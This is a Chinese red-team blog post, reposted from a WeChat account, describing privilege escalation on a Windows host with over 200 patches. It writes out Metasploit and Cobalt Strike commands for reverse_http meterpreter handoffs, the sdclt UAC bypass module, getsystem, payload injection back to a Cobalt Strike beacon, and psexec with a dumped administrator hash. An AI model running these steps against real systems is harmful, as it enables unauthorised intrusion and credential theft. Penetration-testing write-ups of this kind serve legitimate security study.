有几百个补丁的机器提不下来?利用 Metasploit 试试

admin 2022年1月7日07:09:03评论106 views字数 1035阅读3分27秒阅读模式

渗透攻击红队

一个专注于红队攻击的公众号

有几百个补丁的机器提不下来?利用 Metasploit 试试


大家好,这里是 渗透攻击红队 的第 70 篇文章,本公众号会记录一些红队攻击的案例,不定时更新!请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关!


最近遇到一台机器,打了几百个补丁用各种漏洞提权都无果,最后使用 Metasploit 自带的模块把他的特权提升了,这才提权成功,看文章吧!


利用 Metasploit 进行提权

提权过程


首先是发现目标有 200 多个补丁:

有几百个补丁的机器提不下来?利用 Metasploit 试试

随后我根据补丁号去查询相应的 EXP 去尝试提权发现都失败了,这个时候我把 CobaltStrike 的 Shell 互传到了 Metasploit:

MSF:use exploit/multi/handlerset payload windows/meterpreter/reverse_http
CS:创建监听器windows/foreign/reverse_http执行监听器 spawn msf

有几百个补丁的机器提不下来?利用 Metasploit 试试

有几百个补丁的机器提不下来?利用 Metasploit 试试

然后通过 Metasploit 的提权检测找到了几个 exp :

run post/multi/recon/local_exploit_suggester

有几百个补丁的机器提不下来?利用 Metasploit 试试

然后利用模块尝试提权:

exploit/windows/local/bypassuac_sdclt

有几百个补丁的机器提不下来?利用 Metasploit 试试

这个时候弹回来了一个 Meterpreter,发现用户没变,但是当前特权多了很多:

有几百个补丁的机器提不下来?利用 Metasploit 试试

然后直接 getsystem 提权到 SYSTEM:

有几百个补丁的机器提不下来?利用 Metasploit 试试

最后利用 Metasploit 把 SYSYEM 的 shell 传到 CobaltStrike:

MSF:backgrounduse exploit/windows/local/payload_injectset payload windows/meterpreter/reverse_httpset session 3run
CS:windows/beacon_http/reverse_http

有几百个补丁的机器提不下来?利用 Metasploit 试试

有几百个补丁的机器提不下来?利用 Metasploit 试试

这个时候目标 user 还是没改变,但是实际上特权已经有了!可以直接 getsystem:

有几百个补丁的机器提不下来?利用 Metasploit 试试

最后抓到 administrator 的密码后,利用本地管理员的账号 hash ,直接本地 psexec 利用本地 administrator 的密码上线:

有几百个补丁的机器提不下来?利用 Metasploit 试试

有几百个补丁的机器提不下来?利用 Metasploit 试试

这个时候发现就是一个 SYSTEM 的 Beacon 会话了!实战情况下 CobaltStrike 提权不成功,就尝试利用 Metasploit 来尝试提权,兴许会有办法!


有几百个补丁的机器提不下来?利用 Metasploit 试试



渗透攻击红队

一个专注于渗透红队攻击的公众号

有几百个补丁的机器提不下来?利用 Metasploit 试试



有几百个补丁的机器提不下来?利用 Metasploit 试试

有几百个补丁的机器提不下来?利用 Metasploit 试试
点分享
有几百个补丁的机器提不下来?利用 Metasploit 试试
点点赞
有几百个补丁的机器提不下来?利用 Metasploit 试试
点在看

本文始发于微信公众号(渗透攻击红队):有几百个补丁的机器提不下来?利用 Metasploit 试试

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月7日07:09:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   有几百个补丁的机器提不下来?利用 Metasploit 试试http://cn-sec.com/archives/467538.html

发表评论

匿名网友 填写信息